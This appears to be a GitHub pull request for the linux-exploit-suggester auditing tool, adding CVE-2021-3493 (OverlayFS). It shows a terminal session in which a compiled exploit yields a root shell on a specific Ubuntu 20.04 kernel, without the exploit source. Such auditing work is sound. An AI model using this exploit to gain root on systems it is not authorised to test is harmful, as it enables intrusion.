search

The-Z-Labs / linux-exploit-suggester

Linux privilege escalation auditing tool
GNU General Public License v3.0
5.54k stars 1.09k forks source link

Add OverlayFS cap_convert_nscap (CVE-2021-3493) #86

Open bcoles opened 3 years ago

bcoles commented 3 years ago

Unfortunately the src-url is a reupload. The original exploit is embedded in the advisory page. There's no direct link.

user@ubuntu:~/Desktop$ gcc overlayfs.c 
user@ubuntu:~/Desktop$ ./a.out 
bash-5.0# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),120(lpadmin),131(lxd),132(sambashare),1000(user),1002(wireshark)
bash-5.0# uname -a
Linux ubuntu 5.8.0-48-generic #54~20.04.1-Ubuntu SMP Sat Mar 20 13:40:25 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
bash-5.0# cat /etc/lsb-release 
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=20.04
DISTRIB_CODENAME=focal
DISTRIB_DESCRIPTION="Ubuntu 20.04.2 LTS"
bash-5.0#